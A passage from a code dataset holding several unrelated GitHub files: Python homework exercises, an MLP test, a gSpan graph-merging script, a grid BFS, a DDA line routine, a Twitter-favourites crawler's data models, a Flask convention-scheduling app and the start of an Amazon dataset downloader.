')\n\n\n# ---------------------------------------------------------------------\n\n\nprint('\\n3. Задайте последовательность чисел. Напишите программу, которая выведет ' +\n 'список неповторяющихся элементов исходной последовательности.' +\n '\\nРешение:')\n\n# Первое решение:\n\nnumber_set = set()\nout_list = []\nsome_list = list(map(int, input().split()))\nfor ind in range(0, len(some_list)):\n if some_list[ind] not in number_set:\n number_set.add(some_list[ind])\n for ind1 in range(ind + 1, len(some_list)):\n if some_list[ind] == some_list[ind1]:\n break\n else:\n out_list.append(some_list[ind])\nprint(out_list)\n\n\n# Второе решение:\n\nsome_list = list(map(int, input().split()))\nfor i in some_list:\n if some_list.count(i) == 1:\n print(i, end=' ')\n\n\n# ---------------------------------------------------------------------\n","repo_name":"mafik-tolik/PythonLesson4","sub_path":"AnalysisOfHomework.py","file_name":"AnalysisOfHomework.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40710770966","text":"import os\nfrom matplotlib import pyplot as plt\n\nfrom WorkEnv import WorkEnvironment\n\ndef MLPClassifierTest():\n we = WorkEnvironment()\n\n out_path = 'outputs/mlp/'\n os.makedirs(out_path, exist_ok=True)\n\n # Create XY Data from CSV\n data_dimension = 2\n we.add_op(op_key='CSV_XY_DataOp', params={\n 'path': 'data/2d_400_cluster.csv',\n 'data_obj_name': 'hw',\n 'X_columns': [str(i) for i in range(data_dimension)],\n 'Y_column': ['centroid'],\n })\n we.run_op(op_index=0)\n \n # Scale the imported data\n we.add_op(op_key='DataShuffleOp', params={\n 'data_object_op': 0,\n })\n we.run_op(op_index=1)\n\n # Plot data on a scatter plot\n we.add_op(op_key='ScatterPlotOp', params={\n 'data_object_op': 1,\n })\n ret_val = we.run_op(op_index=2)\n if 'plot' in ret_val:\n ret_val['plot'].savefig(\n os.path.join(out_path, 'data_scatter.png')\n )\n \n # Class index to one hot vector,\n # e.g. (2 -> [0,0,1])\n we.add_op(op_key='LabelsToOneHotOp', params={\n 'data_object_op': 1,\n })\n we.run_op(op_index=3)\n\n # Create the MLP Model\n we.add_op(op_key='MLPClassifier_ModelOp', params={\n 'model_name': 'mlp',\n 'associated_data_op': 3,\n 'in_units': 2, 'out_units': 2,\n 'hidden_sizes': [4]\n })\n we.run_op(op_index=4)\n \n # Create trainer for model\n we.add_op(op_key='MLPClassifier_TrainOp', params={\n 'model_object_op': 4,\n 'lr': 0.01, 'epoch': 100, 'batch_size': 32\n })\n we.run_op(op_index=5)\n\n # Visualize model training loss\n we.add_op(op_key='MLPClassifier_VisualizeOp', params={\n 'model_object_op': 5,\n 'option':'loss',\n })\n ret_val = we.run_op(op_index=6)\n if 'plot' in ret_val:\n ret_val['plot'].savefig(\n os.path.join(out_path, 'loss_plot.png')\n )\n\n # Visualize model training loss\n we.add_op(op_key='MLPClassifier_VisualizeOp', params={\n 'model_object_op': 5,\n 'option':'decision',\n })\n ret_val = we.run_op(op_index=7)\n if 'plot' in ret_val:\n ret_val['plot'].savefig(\n os.path.join(out_path, 'boundary_plot.png')\n )\n\n\nif __name__ == \"__main__\":\n MLPTest()","repo_name":"cahity/Ceres","sub_path":"ceres/externals/MLlib/testing/mlp_classifier.py","file_name":"mlp_classifier.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"3171662550","text":"#!/usr/bin/env python3\nimport glob,os\nimport argparse\nfrom GraphBuilder import *\n\n\nclass MergeGspan:\n def __init__(self):\n pass\n\n def run(self):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--out\", help=\"Name of the output file\")\n parser.add_argument(\"--c\", help=\"create gspan file from SCDG\",type=bool)\n parser.add_argument(\"dir\", help=\"directory with gspan files to merge\")\n parser.add_argument(\"--fam\",help=\"malware family\",default=\"stub\")\n args = parser.parse_args()\n\n if args.out:\n out = args.out\n else:\n out = 'SCDG_mirai_global.gs'\n\n os.chdir(args.fam)\n\n if args.c :\n for file in glob.glob(\"*SCDG.txt\") :\n data = []\n f = open(file,'r')\n for line in f:\n #print(string)\n\n a = line.replace('\\n','')\n b = a.replace('\\t','')\n c = b.strip()\n d = c.replace(\"<\",\"'<\").replace(\">\",\">'\").replace(\"'<=\",\"<=\").replace(\">' \",\"> \").replace(\"''\",\"'\")\n data.append(eval(d))\n f.close()\n g =GraphBuilder(name=file,mapping='../res/mapping.txt',merge_call=True,comp_args=False,min_size=0,ignore_zero=True,odir='../../'+args.fam+'_gs',get_info=False)\n g.build_graph(data)\n\n print(args.fam)\n print(args.dir)\n\n os.chdir('../'+args.dir)\n id_graph = 0\n res = open(out,'w')\n\n for file in glob.glob(\"*.gs\") :\n print(file)\n f = open(file,'r')\n fstat = os.stat(file)\n if fstat.st_size > 150 :\n for line in f :\n if 't #' in line:\n res.write('t # '+str(id_graph)+'\\n')\n id_graph += 1\n else :\n res.write(line)\n f.close()\n res.close()\n","repo_name":"csvl/SEMA-ToolChain","sub_path":"script/MergeGspan.py","file_name":"MergeGspan.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"26251994265","text":"from collections import deque\n\nR, C = map(int, input().split())\nsy, sx = map(int, input().split())\ngy, gx = map(int, input().split())\nc = [list(input()) for _ in range(R)]\n\nMAX = 10**29\ndp = [MAX] * (R*C)\n\nq = deque()\nq.append((sx-1, sy-1))\ndp[(sx-1) * C + sy-1] = 0\n\nwhile len(q) >= 1:\n pos = q.popleft()\n pos_i = (pos[0]) * C + pos[1]\n\n poses = [\n (pos[0]+1, pos[1]),\n (pos[0], pos[1]+1),\n (pos[0]-1, pos[1]),\n (pos[0], pos[1]-1)\n ]\n\n for to in poses:\n to_i = to[0] * C + to[1]\n\n if dp[to_i] == MAX and c[to[0]][to[1]] != \"#\":\n dp[to_i] = min(dp[pos_i] + 1, dp[to_i])\n q.append(to)\n\n # print(len(q))\n# print(dp)\n# for i in range(0, R*C, C):\n# print(dp[i:i+C])\nprint(dp[(gy-1) * C + gx-1])\n\n","repo_name":"ryuki999/atcoder","sub_path":"other_contest/kyopro-tessoku/ch09/b63.py","file_name":"b63.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41710512353","text":"def getLine(start, end):\n \"\"\"\n DDA Algorithm\n Produces a list of tuples/pixels (x,y) to be printed\n \"\"\"\n # Setting up initial values\n points = []\n x1, y1 = start\n x2, y2 = end\n dx = x2 - x1\n dy = y2 - y1\n\n # Calculating the number of interations\n iter = abs(dx) if abs(dx) > abs(dy) else abs(dy)\n\n # Increment has to be 1 or -1 in the right axis\n x_inc = dx/iter\n y_inc = dy/iter\n\n # Getting initial point\n x = x1\n y = y1\n\n # Iterating to generate points of the line\n points.append((x,y))\n for i in range(0, iter):\n x += x_inc\n y += y_inc\n points.append((round(x),round(y)))\n\n return points","repo_name":"vinacovre/computerGraphics","sub_path":"Final Project (API)/dda.py","file_name":"dda.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13786007031","text":"import json\nfrom learn.file_loader import load\n\n\n_OCCURENCES_PATH = '/home/ubuntu/Notebooks/Project/EPIK_Solution/all_data/extracted/transformed/Occurrences/'\n_OCCURENCES = load(_OCCURENCES_PATH)\n\ndef transform_nb_photos(j_son):\n if isinstance(j_son, str):\n temp = json.loads(j_son)\n num_photos = 0\n for k,v in temp.items():\n num_photos += int(k)\n return num_photos\n else:\n return 0\n \n \ndef transform_photos_surface(j_son):\n if isinstance(j_son, str):\n temp = json.loads(j_son)\n photos_surface = 0\n for k,v in temp.items():\n photos_surface += int(k) * (v['w'] * v['h'])\n return photos_surface\n else:\n return 0\n\n\ndef title_transformation(row):\n temp_cat = row['category_id']\n temp_period = row['period']\n temp_title = row['title']\n \n for occ in _OCCURENCES[(_OCCURENCES['period'] == temp_period) & \n (_OCCURENCES['category_id'] == temp_cat)]['phrase']:\n if occ in temp_title.lower():\n return 1\n return 0\n\n\ndef description_transformation(description):\n pass\n","repo_name":"Kotuzo/EPIK_Solution","sub_path":"src/learn/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6014731621","text":"import bcrypt\nimport binascii\ntry:\n from urllib.request import urlretrieve\n from urllib.parse import urlparse\nexcept ImportError:\n from urllib import urlretrieve\n from urlparse import urlparse\nimport os\nimport logging\nfrom logging.handlers import RotatingFileHandler\nimport json\nimport datetime\nfrom collections import defaultdict\n\nfrom app import app\nfrom app import db\nfrom app.models import Convention, Event, Track, Room, RoomGroup, Timeslot, DataLoadError\nfrom app.models import User\nfrom flask import jsonify, request, render_template, url_for, redirect, session, abort\nfrom flask.ext.login import LoginManager, login_required\nfrom flask.ext.login import login_user, logout_user, current_user\nfrom wtforms import Form, StringField\nfrom wtforms.validators import DataRequired\nfrom sqlalchemy.orm.exc import MultipleResultsFound\nfrom sqlalchemy.exc import SQLAlchemyError\n\nimport refresh_data\n\n# Set up logging.\nif not app.debug:\n if 'APP_ROOT' in app.config:\n log_fname = os.path.join(app.config['APP_ROOT'], 'crem.log')\n else:\n log_fname = 'crem.log'\n filehandler = logging.handlers.RotatingFileHandler(log_fname, 'a',\n 100000, 10)\n filehandler.setLevel(logging.INFO)\n filehandler.setFormatter(logging.Formatter(\n '%(asctime)s %(process)-6s %(levelname)-8s: %(funcName)s: %(message)s'))\n app.logger.addHandler(filehandler)\n app.logger.setLevel(logging.INFO)\n\n\ndef generate_csrf_token():\n \"\"\"\n Generate a CSRF token that can be included in forms, and checked in\n methodes which accept POST data.\n \"\"\"\n if '_csrf_token' not in session:\n session['_csrf_token'] = binascii.hexlify(os.urandom(24))\n return session['_csrf_token']\n\napp.jinja_env.globals['csrf_token'] = generate_csrf_token\n\n\n# Setup security.\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n\n@login_manager.user_loader\ndef user_loader(user_id):\n try:\n return User.query.get(user_id)\n except SQLAlchemyError as e:\n app.logger.error('Unable to query for user in user_loader(): %s' % e)\n abort(500)\n\n\nclass LoginForm(Form):\n username = StringField('username', validators=[DataRequired()])\n password = StringField('password', validators=[DataRequired()])\n\n\nclass ImportForm(Form):\n source_url = StringField('source_url', validators=[DataRequired()])\n\n\ndef jsdate2py(s):\n \"\"\"\n Converts a string to a Python datetime object. Returns None if the string\n cannot be converted. An example of the string is:\n\n 2016-4-29T:20\n \"\"\"\n try:\n parts = s.strip().split('T:')\n dateparts = parts[0].split('-')\n year = int(dateparts[0])\n month = int(dateparts[1])\n day = int(dateparts[2])\n hour = int(parts[1])\n except Exception:\n return None\n return datetime.datetime(year, month, day, hour, 0, 0)\n\n\n@app.route('/')\ndef root():\n return app.send_static_file('index.html')\n\n\n@app.route('/convention.json', methods=['GET', 'POST'])\ndef convention():\n if request.method == 'GET':\n conventions = Convention.query.all()\n return jsonify(configs = [i.configs for i in conventions])\n else:\n content = request.json\n try:\n convention = Convention.query.one()\n except MultipleResultsFound:\n # Error: there should be one and only one convention record.\n return ('There is more than one convention record.', 500)\n convention.name = content['name']\n\n # Convert the start date to a Python datetime object.\n start_dt = jsdate2py(content['start_dt'])\n if start_dt is None:\n return ('Unable to parse the convention start date.', 500)\n convention.start_dt = start_dt\n\n # Convert the timeslot length from minutes to a timedelta object.\n convention.timeslot_length = datetime.timedelta(0, int(content['timeslot_length']) * 60)\n\n convention.number_of_timeslots = content['number_of_timeslots']\n\n # Update the database.\n try:\n db.session.add(convention)\n db.session.commit()\n except SQLAlchemyError as e:\n return ('Error updating the convention record: %s' % e, 500)\n return ('Convention data successfully updated.', 200)\n\n@app.route('/number_of_timeslots.json')\ndef number_of_timeslots():\n number_of_timeslots = Timeslot.query.count()\n return jsonify(number_of_timeslots = number_of_timeslots)\n\n@app.route('/tracks.json')\ndef tracks():\n tracklist = Track.query.all()\n return jsonify(tracknames = [i.names for i in tracklist])\n\n@app.route('/columns.json')\ndef columns():\n return jsonify(\n columns = {\n 'eventnumber': {'id':'eventnumber','name':'#',},\n 'title': {'id':'title','name':'Title',},\n 'track': {'id':'track','name':'Track',},\n 'start': {'id':'start','name':'Start',},\n 'duration': {'id':'duration','name':'Duration',},\n 'rooms': {'id':'rooms','name':'Room',},\n 'type': {'id':'type','name':'Type',},\n 'presenters': {'id':'presenters','name':'Program Participants',},\n 'resources': {'id':'resources','name':'Resources',},\n 'description': {'id':'description','name':'Description',},\n 'comments': {'id':'comments','name':'Staff Comments',},\n 'conflict': {'id': 'conflict','name':'Conflict',}\n })\n\n@app.route('/eventlist.json')\ndef events():\n events = Event.query.all()\n\n # Index events by ID, prepare for conflict annotation\n events_by_id = {}\n for event in events:\n data = event.useroutput\n data['conflict'] = \"
      OK
      \"\n events_by_id[event.id] = data\n\n # Collate events by timeslot+presenter and timeslot+room\n events_by_timeslot_and_presenter = defaultdict(list)\n events_by_timeslot_and_room = defaultdict(list)\n for event in events:\n\n # Ignore inactive events\n if not event.active:\n continue\n\n # Scan all timeslots for the event\n for timeslot in event.timeslots:\n\n # Collect this event into a timeslot:presenter bucket\n for presenter in event.presenters:\n key = '%s:%s' % (timeslot.id, presenter.id)\n events_by_timeslot_and_presenter[key].append(event.id)\n\n # Collect this event into a timeslot:room bucket\n for room in event.rooms:\n key = '%s:%s' % (timeslot.id, room.id)\n events_by_timeslot_and_room[key].append(event.id)\n\n # Annotate events with presenter conflicts\n for key, event_ids in list(events_by_timeslot_and_presenter.items()):\n # If this timeslot & presenter appears in multiple events, all those\n # events are in conflict.\n if len(event_ids) > 1:\n for event_id in event_ids:\n events_by_id[event_id]['conflict'] = \"
       Participant
      \"\n\n # Annotate events with room conflicts\n for key, event_ids in list(events_by_timeslot_and_room.items()):\n # If this timeslot & room appears in multiple events, all those\n # events are in conflict.\n if len(event_ids) > 1:\n for event_id in event_ids:\n if events_by_id[event_id]['conflict'] == \"
       Participant
      \":\n events_by_id[event_id]['conflict'] += \"
       Room
      \"\n else:\n events_by_id[event_id]['conflict'] = \"
       Room
      \"\n\n return jsonify(eventlist = list(events_by_id.values()))\n\n@app.route('/rooms.json', methods=['GET', 'POST'])\ndef rooms():\n if request.method == 'GET':\n roomlist = Room.query.all()\n return jsonify(rooms=[i.ui_rooms for i in roomlist])\n else:\n rooms = request.json\n for room in rooms:\n if 'id' not in room:\n db_room = Room()\n else:\n db_room = Room.query.get(room['id'])\n db_room.room_name = room['name']\n db_room.room_sq_ft = room['sq_ft']\n db_room.room_capacity = room['capacity']\n db_room.room_group_id = room['group_id']\n db.session.add(db_room)\n\n # Update the database.\n try:\n db.session.commit()\n except SQLAlchemyError as e:\n return ('Error updating the room records: %s' % e, 500)\n return ('Room configs successfully updated.', 200)\n\n@app.route('/room_groups.json')\ndef room():\n roomgrouplist = RoomGroup.query.all()\n return jsonify(\n room_groups = [i.ui_room_groups for i in roomgrouplist],\n )\n\n@app.route('/configs.json')\ndef combined_info():\n convention = Convention.query.first()\n tracks = Track.query.all()\n rooms = Room.query.all()\n room_groups = RoomGroup.query.all()\n return jsonify(\n {\n \"convention\": {\n \"name\": convention.name,\n \"start_dt\": convention.start_dt.strftime(convention.datetime_format),\n \"timeslot_length\": int(convention.timeslot_duration.total_seconds()/60),\n \"number_of_timeslots\": convention.number_of_timeslots,\n },\n \"tracks\": [i.names for i in tracks],\n \"rooms\": [{\"name\": i.room_name,\n \"capacity\": i.room_capacity,\n \"sq_ft\": i.room_sq_ft,\n \"group_id\": i.room_group_id,\n \"id\": i.id,\n # TODO: rename this to bookings and make values returned useful.\n \"available_timeslots\": [{\"name\": j.timeslot.name,\n \"index\": j.timeslot.timeslot_index\n }\n for j in i.bookings],\n \"suitable_events\": [{\"id\": j.id,\n \"title\": j.title\n }\n for j in i.suitable_events]\n }\n for i in rooms],\n \"room_groups\": [i.ui_room_groups for i in room_groups]\n }\n )\n\n\n@app.route('/refresh-database', methods=['GET', 'POST'])\n@login_required\ndef refresh_database():\n error = None\n form = ImportForm(request.form)\n if request.method == 'POST' and form.validate():\n # Check the CSRF token.\n token = session.pop('_csrf_token', None)\n if not token or token != request.form.get('_csrf_token'):\n abort(403)\n\n url = form.source_url.data.strip()\n if not url:\n app.logger.info('No URL specified')\n error = 'The URL for schedule document was not specified'\n else:\n app.logger.info('The user specified the URL %s' % url)\n\n # Make sure the URL has the right suffix to export in CSV form.\n urlparts = urlparse(url)\n path = urlparts.path\n if path.lower().endswith('/pub'):\n path = path[:-4]\n elif path.endswith('/'):\n path = path[:-1]\n newurl = '%s://%s%s/pub?output=csv' % (urlparts.scheme, urlparts.netloc,\n path)\n app.logger.info('The new URL is %s' % newurl)\n\n try:\n result = urlretrieve(newurl)\n except Exception as e:\n error = 'Unable to read the schedule document: %s' % e\n else:\n # Refresh the database and delete the temporary export file.\n fname = result[0]\n refresh_data.refresh_data(fname)\n os.remove(fname)\n\n # Show any errors which occurred.\n return redirect('/show-database-errors')\n return render_template('refresh_database.html', form=form, error=error)\n\n\n@app.route('/show-database-errors')\n@login_required\ndef show_database_errors():\n # Display errors and warnings that occurred when refreshing the database.\n load_errors = DataLoadError.query.order_by(DataLoadError.line_num).all()\n return render_template('load_errors.html', load_errors=load_errors)\n\n\n@app.route('/login/', methods=['GET', 'POST'])\ndef login():\n error = None\n form = LoginForm(request.form)\n if request.method == 'POST' and form.validate():\n # Check the CSRF token.\n token = session.pop('_csrf_token', None)\n if not token or token != request.form.get('_csrf_token'):\n abort(403)\n\n try:\n user = User.query.get(form.username.data)\n except SQLAlchemyError as e:\n app.logger.error('Unable to query for user in login(): %s' % e)\n abort(500)\n password = form.password.data\n if user and bcrypt.hashpw(password.encode('utf-8'), user.encpwd.encode('utf-8')).decode() == user.encpwd:\n user.authenticated = True\n db.session.add(user)\n try:\n db.session.commit()\n except SQLAlchemyError as e:\n app.logger.error('Unable to commit user authentication in login(): %s' % e)\n abort(500)\n login_user(user, remember=True)\n return redirect('/')\n else:\n error = 'the user name or password are incorrect.'\n return render_template('login.html', form=form, error=error)\n\n\n@app.route('/logout/', methods=[\"GET\"])\ndef logout():\n user = current_user\n if user.get_id():\n user.authenticated = False\n db.session.add(user)\n try:\n db.session.commit()\n except SQLAlchemyError as e:\n app.logger.error('Unable to commit user authentication in logout(): %s' % e)\n abort(500)\n logout_user()\n return redirect('/')\n","repo_name":"MattArnold/CREM","sub_path":"app/routes/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":13873,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"18750178756","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom google.appengine.ext import db\nfrom datetime import datetime\nimport feedparser\n\nimport logging\n\nTWITTER_FAV_URL_FORMAT = \"http://twitter.com/favorites/%s.rss\"\n\ndef debug(msg):\n pass\n# logging.getLogger().debug(msg)\n\nclass Counter(db.Model):\n \"\"\"Counter\n \"\"\"\n name = db.StringProperty(verbose_name=\"counter name\",\n default=\"favotter\")\n count = db.IntegerProperty(verbose_name=\"counter\",\n default=0)\n updated = db.DateTimeProperty(verbose_name=\"The time this row is updated\",\n auto_now=True)\n created = db.DateTimeProperty(verbose_name=\"The time this row is created\",\n auto_now_add=True)\n\ndef add_tuser_counter(num):\n counters_query = db.GqlQuery(\"SELECT * FROM Counter WHERE name = :1 LIMIT 1\",\n \"tuser\")\n if counters_query.count() > 0:\n counter = counters_query[0]\n else:\n debug(\"created new counter\")\n counter = Counter()\n counter.count = counter.count + num\n counter.put()\n\ndef get_tuser_count():\n counters_query = db.GqlQuery(\"SELECT * FROM TuserCount LIMIT 1\")\n if counters_query.count() > 0:\n counter = counters_query[0]\n else:\n debug(\"created new counter\")\n counter = Counter()\n return counter.count\n\ndef add_tweet_count(num):\n counters_query = db.GqlQuery(\"SELECT * FROM Counter WHERE name = :1 LIMIT 1\",\n \"tweet\")\n if counters_query.count() > 0:\n counter = counters_query[0]\n else:\n debug(\"created new counter\")\n counter = Counter(name=\"tweet\")\n counter.count = counter.count + num\n counter.put()\n\ndef add_fav_count(num):\n counters_query = db.GqlQuery(\"SELECT * FROM Counter WHERE name = :1 LIMIT 1\",\n \"fav\")\n if counters_query.count() > 0:\n counter = counters_query[0]\n else:\n debug(\"created new counter\")\n counter = Counter(name=\"fav\")\n counter.count = counter.count + num\n counter.put()\n\nclass Fav(db.Model):\n \"\"\"A favorite\"\"\"\n tweet_url = db.StringProperty(verbose_name=\"tweet url (expressed in string)\",\n required=True)\n user_name = db.StringProperty(verbose_name=\"user name (expressed in string)\",\n required=True)\n\n updated = db.DateTimeProperty(verbose_name=\"The time this favorite is updated\",\n auto_now=True)\n created = db.DateTimeProperty(verbose_name=\"The time this favorite is created\",\n auto_now_add=True)\n\nclass Tuser(db.Model):\n \"\"\"A user who want to crawl\"\"\"\n uid = db.StringProperty(verbose_name=\"user id (expressed in string)\"\n )\n name = db.StringProperty(verbose_name=\"The user's twitter account\",\n required=True)\n profile_image = db.LinkProperty(verbose_name=\"Link to the icon image\",\n required=True)\n\n priority = db.IntegerProperty(verbose_name=\"The priority of the user\",\n default=1,\n required=True)\n last_crawl = db.DateTimeProperty(verbose_name=\"The last time the user crawled\",\n required=True)\n updated = db.DateTimeProperty(verbose_name=\"The time this user is updated\",\n auto_now=True)\n created = db.DateTimeProperty(verbose_name=\"The time this user is created\",\n auto_now_add=True)\n\n def putfav(self):\n fav_feed_url = TWITTER_FAV_URL_FORMAT % self.name\n favorites = feedparser.parse(fav_feed_url)\n debug(\"putfav %d\" % len(favorites.entries))\n fav_count = 0\n for favorite in favorites.entries:\n debug(favorite.title)\n fav_time = datetime(*(favorite.updated_parsed[:6]))\n # Pass old favorite\n if fav_time < self.last_crawl:\n continue\n tweet = Tweet(url=favorite.id,\n text=favorite.title,\n html_text=favorite.title)\n fav = Fav(tweet_url=favorite.id,\n user_name=self.name)\n tweet.put()\n fav.put()\n fav_count = fav_count + 1\n self.last_crawl = datetime.now()\n self.put()\n return fav_count\n\nclass Tweet(db.Model):\n \"\"\"A tweet\"\"\"\n url = db.StringProperty(verbose_name=\"tweet url (expressed in string)\",\n required=True)\n text = db.TextProperty(verbose_name=\"The tweet\",\n required=True)\n html_text = db.TextProperty(verbose_name=\"The tweet as html\")\n created = db.DateTimeProperty(verbose_name=\"The time this tweet is created\",\n auto_now_add=True)\n\nclass CrawlStatus(db.Model):\n favotter_crawl = db.DateTimeProperty(verbose_name=\"favotter crawled\",\n auto_now=True)\n tsearch_crawl = db.DateTimeProperty(verbose_name=\"twitter search crawled\",\n auto_now=True)\n\n\ndef recentTuser():\n users = db.GqlQuery(\n \"SELECT * FROM Tuser ORDER BY created DESC LIMIT 1\"\n )\n for user in users:\n return user\n return None\n# return users[0] if users else None\n\ndef delete50users():\n q = db.GqlQuery(\"SELECT * FROM Tuser\")\n results = q.fetch(1000)\n db.delete(results)\n\ndef countusers():\n q = db.GqlQuery(\"SELECT * FROM Tuser\")\n return q.count()\n\ndef users_dict_by_names(names):\n users = db.GqlQuery(\"SELECT * FROM Tuser WHERE name IN :1\", names)\n dic = {}\n for user in users:\n dic[user.name] = user\n return dic\n\ndef users_to_fav():\n users = db.GqlQuery(\"SELECT * FROM Tuser ORDER BY last_crawl ASC LIMIT 2\")\n return users\n","repo_name":"suztomo/favotter","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31499595248","text":"import sys\n\ndef compare_insert(longer, shorter, shorter_len):\n differ = False\n shift = 0\n for i in range(shorter_len):\n if longer[i + shift] != shorter[shift]:\n if not differ:\n differ = True\n shift = 1\n else:\n return False\n return True\n\n\ndef compare_change(f, s, l):\n differ = False\n for i in range(l):\n if f[i] != s[i]:\n if not differ:\n differ = True\n else:\n return False\n return True\n\n\ndef check_strings(s_1, s_2, len_1, len_2):\n if abs(len_1 - len_2) > 1:\n return False\n elif len_1 == len_2 + 1:\n return compare_insert(s_1, s_2, len_2)\n elif len_2 == len_1 + 1:\n return compare_insert(s_2, s_1, len_1)\n else:\n return compare_change(s_1, s_2, len_1)\n\n\ns_1 = list(sys.stdin.readline())\ns_2 = list(sys.stdin.readline())\nlen_1 = len(s_1)\nlen_2 = len(s_2)\nprint(check_strings(s_1, s_2, len_1, len_2))\n\n","repo_name":"Mitan/interview-book","sub_path":"ch_1/1_5.py","file_name":"1_5.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73965734634","text":"from cartblanche.app import db\nfrom cartblanche.helpers.validation import base62, get_basic_tranche, get_compound_details, get_new_tranche\nfrom sqlalchemy.ext.hybrid import hybrid_property, hybrid_method\nfrom sqlalchemy import func\nfrom sqlalchemy.orm import load_only\nimport random\nimport sqlalchemy as sa\nfrom cartblanche.data.models.tin.tranches_mapping import Tranches\nfrom cartblanche.data.models.tin.catalog import CatalogSubstanceModel\n\nTABLE_ROW_COUNT_SQL = \\\n \"\"\" SELECT CAST(reltuples AS BIGINT) AS num_rows\n FROM pg_catalog.pg_class\n WHERE oid = CAST(:table AS pg_catalog.regclass)\n \"\"\"\n\n\nclass SubstanceModel(db.Model):\n #__bind_key__ = 'tin'\n __tablename__ = 'substance'\n\n sub_id = db.Column(db.BigInteger, primary_key=True, nullable=False,\n doc=\"A numeric (integer) representation of ZINC ID\")\n smiles = db.Column(db.String(), \n unique=True, nullable=False,\n doc=\"A query-enabled molecular structure (use the contains and match operators)\")\n inchikey = db.Column('inchikey', db.CHAR(27), unique=True, nullable=False,\n doc=\"The Substance's InChI key\")\n purchasable = db.Column('purchasable', db.Integer, default=-1, nullable=True,\n server_default='0',\n doc=\"A numeric representation of the commercial availability of this compound \"\n \"(high is better)\")\n date_updated = db.Column(db.Date, nullable=True)\n\n catalog_contents = db.relationship(\"CatalogContentModel\",\n secondary=\"catalog_substance\",\n backref=\"substances\",\n lazy='joined')\n tranche_id = db.Column('tranche_id', db.Integer)\n\n @classmethod\n def get_random(cls, limit):\n return cls.query.options(load_only('sub_id')).offset(\n func.floor(\n func.random() *\n db.session.query(func.count(cls.sub_id))\n )\n ).limit(limit).all()\n\n @classmethod\n def get_random2(cls, limit):\n rowcount_query = sa.text(TABLE_ROW_COUNT_SQL)\n count = db.session.connection().execute(rowcount_query, table='substance').scalar()\n print(\"Row Count: ===========================================\", count)\n offset = abs(int(count * random.random())-int(limit))\n return cls.query.offset(offset).limit(limit)\n\n @classmethod\n def get_random3(cls, limit):\n offset = func.floor(func.random() * 100)\n return cls.query.offset(offset).limit(limit)\n\n @classmethod\n def find_by_sub_id(cls, sub_id):\n return cls.query.filter_by(sub_id=sub_id).first()\n\n @hybrid_property\n def zinc_id(self):\n if self.tranche:\n return \"ZINC{}{}{}\".format(self.tranche['mwt'], self.tranche['logp'], base62(self.sub_id).zfill(10))\n return \"Unknown\"\n\n @hybrid_property\n def tranche(self):\n if self.tranche_id:\n tranchee = Tranches.query.filter_by(tranche_id=self.tranche_id).first()\n return get_new_tranche(tranchee.tranche_name)\n return get_basic_tranche(self.smiles)\n\n def json_ids(self):\n return {\n 'zinc_id': self.zinc_id,\n 'smiles': self.smiles\n }\n\n def json(self):\n return {\n 'tranche': self.tranche,\n 'zinc_id': self.zinc_id,\n 'sub_id': self.sub_id,\n 'smiles': self.smiles,\n 'supplier_code': [c.supplier_code for c in self.catalog_contents],\n 'catalogs': [c.catalog.json() for c in self.catalog_contents],\n 'tranche_details': get_compound_details(self.smiles),\n 'tranche_id': self.tranche_id\n }\n\n def json2(self):\n return {\n 'tranche': self.tranche,\n 'zinc_id': self.zinc_id,\n 'sub_id': self.sub_id,\n 'smiles': self.smiles\n }\n\n def json_all(self, tin_url):\n res = {\n 'sub_id': self.sub_id,\n 'zinc_id': self.zinc_id,\n 'smiles': self.smiles,\n 'inchikey': str(self.inchikey).strip(),\n 'purchasable': self.purchasable,\n 'supplier_code': [c.supplier_code for c in self.catalog_contents],\n 'catalogs': [c.catalog.json() for c in self.catalog_contents],\n 'server': tin_url\n # 'logp': self.logp\n }\n\n return {**res, **self.tranche}\n\n","repo_name":"docking-org/cartblanche22","sub_path":"backend/cartblanche/data/models/tin/substance.py","file_name":"substance.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28737965930","text":"import urllib.request\nfrom gzip import GzipFile\nfrom pathlib import Path\nfrom tempfile import NamedTemporaryFile\nfrom zipfile import ZIP_DEFLATED, ZipFile\n\nimport pandas as pd\n\nfrom .downloader import BaseDownloader\n\n\nclass AmazonMusicDataManager(BaseDownloader):\n DEFAULT_PATH = Path(\"~/.amazon-music.zip\").expanduser()\n\n def _save_to_zippath(self, path: Path) -> None:\n ratings_url = \"http://snap.stanford.edu/data/amazon/productGraph/categoryFiles/ratings_Digital_Music.csv\"\n meta_url = \"http://snap.stanford.edu/data/amazon/productGraph/categoryFiles/meta_Digital_Music.json.gz\"\n with ZipFile(path, \"w\", compression=ZIP_DEFLATED) as zf:\n print(\"download rating...\")\n with NamedTemporaryFile(\"w\") as rating_temp:\n urllib.request.urlretrieve(ratings_url, rating_temp.name)\n rating_temp.seek(0)\n zf.write(rating_temp.name, \"amazon-music/ratings.csv\")\n\n print(\"download item meta data...\")\n with NamedTemporaryFile(\"w\") as meta_temp:\n 